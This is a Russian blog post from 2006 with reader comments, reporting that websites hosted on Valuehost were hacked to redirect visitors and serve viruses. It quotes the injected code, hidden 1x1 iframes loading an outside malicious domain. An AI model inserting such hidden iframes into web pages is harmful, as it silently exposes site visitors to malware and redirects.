Реклама

<< | >>

RJ45
Замечать какие-то баги стала где-то с середины октября. А вчера...

Открыла для работы сайт клиента, что лежит на Валуехост. Опять как-то тормозно и подергиваясь подгрузился. Да что ж с ним, черт. Отвлеклась отхлебнуть чаю. Возвращаюсь к монитору... Опс! Меня благополучно перебрасывает на dosug.nu
Приплыли! Не может же быть! Опять что ли!?
Лезу в код. Внизу страницы прописано: 

<iframe src="http://ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1></iframe></body>
<iframe src="http://ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1></iframe></html>

Тэээкс... В страшном предчувствии открываю сайт второго клиента, что тоже на Валуехосте. Знакомые подергивания при загрузке. Ага... Мелькает знакомый IP в строке состояния. Лезу в код. Такая же ботва. Тьфу ты...
 
Открываю яндекс, набираю link="ltraffic.biz/*"

Беру на выбор сайты, убеждаюсь, что лежат на Валуехосте, смотрю внизу страницы код... Аналогичная картина.

arden.ru
lionlabs.com
dobermannclub.ru
eprussia.ru
fortification.ru

ну и так далее... Одно из двух. Либо они сами так охринели, либо их опять сломали.
Сдуру гуляю по сайтам через IE. Антивирус периодически повякивает.
В последствии диагностирует следующее:



Не, ну я могу еще стойко перенести, если в коде просто ссылки. Но редирект на порнуху или периодическая подкачка вируса - это уже определенно перебор.
И главное полное молчание от Валуя ... тишь да благодать. А кто из пользователей не заметил внедрений на своем сайте, так это его невнимательного пользователя проблемы. Пусть дальше помогает зарабатывать на порнотрафике и распространении вирусов. А так же неплохой риск попасть за редирект в бан у поисковиков...

UPD: Прошлась по этим сайтам с работы. После загрузки сайта антивирус NOD32 выдает следующее:



UPD2: Официальный ответ Valuehost:


Порадовала официальная новость: http://www.viruslist.com/ru/weblog?weblogid=207758614

Tags:

Comments

( 24 коментов — Высказаться )
[info]_timberwolf_ wrote:
24 Окт, 2006 18:52 (UTC)
Отлично, отлично!
[info]murrena wrote:
24 Окт, 2006 19:31 (UTC)
что ж тут отличного )
[info]iul4a wrote:
24 Окт, 2006 20:37 (UTC)
ацтой
ндя.. валуи чета чета... :) как всегда чем-то "качественным" отличаются ;)

но рейтинг конечно доменный у них не отнять ;)
[info]murrena wrote:
24 Окт, 2006 20:54 (UTC)
Re: ацтой
у меня было бы тоже его не отнять, если бы я так заманивала, а потом за то чтобы просто сменить хостинг еще и 30 баксов требовала ;)
[info]iul4a wrote:
24 Окт, 2006 21:15 (UTC)
Re: ацтой
второе как всем известно более существенно чем первое ;)
(без темы) - [info]serfar - 25 Окт, 2006 06:21 (UTC)
[info]murrena wrote:
25 Окт, 2006 06:45 (UTC)
ну ваще тут написано, что продавец базы может являться обычным мошенником...
скорее всего тут ничего не доказуемо(
[info]slider wrote:
26 Окт, 2006 17:46 (UTC)
Сайтами валуехоста пользуются как минимум с середины лета, но делают это тихо , в основном для ссылочного ранжирования. Но вот база попала в паблик, и народ, видимо, решил, что если не они то кто-то другой это начнет делать и стал пихать эксплойты.

А валуехост по-видимому, до сих пор делает вид, что дыры нет..
Уходить от этого хостера нужно, как можно быстрее. :)
[info]_timberwolf_ wrote:
25 Окт, 2006 15:40 (UTC)
А скока просят-то?
[info]murrena wrote:
25 Окт, 2006 17:45 (UTC)
http://dp.ru/spb/news/incident/2006/10/20/106165/
300 бачей ) не так уж и много )
[info]_timberwolf_ wrote:
26 Окт, 2006 17:13 (UTC)
Продать, что ли, что-нибудь...
[info]iul4a wrote:
25 Окт, 2006 12:57 (UTC)
ну и чего там?.. есть продвиги?
[info]murrena wrote:
25 Окт, 2006 18:55 (UTC)
угу. ответили
[info]ecodark wrote:
25 Окт, 2006 15:20 (UTC)
У меня есть сайт на valuehost, он 16 октября с утра получил такой довесок в файл index.php. Я засек это дело через час и стер, потом долго искал дыру. Вот догадался поискать инфу в ЖЖ )) А сегодня сайт вообще исчез - в "Валуе" обещают к вечеру починить. Посмотрим.
[info]murrena wrote:
25 Окт, 2006 17:45 (UTC)
ага. значит все таки действительно 16-го...
кстати вот занятная ссылка по теме http://dp.ru/spb/news/incident/2006/10/20/106165/
Новость свежая ;)
[info]yuj wrote:
26 Окт, 2006 00:55 (UTC)
это ладно, вчера Ведомости так же взломали (Ведомости!)

http://yuj.livejournal.com/29893.html
[info]ipchains wrote:
27 Окт, 2006 17:40 (UTC)
что же настолько все плохо? (:
[info]ipchains wrote:
27 Окт, 2006 17:41 (UTC)
да стоп, виндовый хостинг???
[info]murrena wrote:
27 Окт, 2006 18:10 (UTC)
да не обычный дешевый юниксовый
[info]ipchains wrote:
28 Окт, 2006 11:15 (UTC)
ды, может тогда проблема не хостера, а движка сайта??
[info]murrena wrote:
28 Окт, 2006 14:39 (UTC)
сразу у 300-от сайтов на разных движках???
забавно )
[info]sfrolov wrote:
13 Ноя, 2006 09:02 (UTC)
Ха! У меня такое же было.
[info]lba wrote:
29 Ноя, 2006 09:10 (UTC)
О, спасибо за информацию!
Сегодня наконец сопоставил данные whois по таким троянам в index.* на 4х сайтах клиентов, увидел холуйхост и нашел обсуждения.

Самое веселое - даты модификации файлов:
(2006.11.02)
(2006.11.08)
(11.05.2006, 27.11.2006)
(31.10.2006, 28.11.2006)

Т.е. фигня продолжается уже больше месяца, а эти холуи так и не чешутся...
[info]murrena wrote:
29 Ноя, 2006 22:07 (UTC)
да похоже что до сих пор.
пароль от ftp меняли уже дважды. но в обзорах пишут, что по логам соединение происходит с сервером сразу же без перебора логина и пароля. через хостера...
( 24 коментов — Высказаться )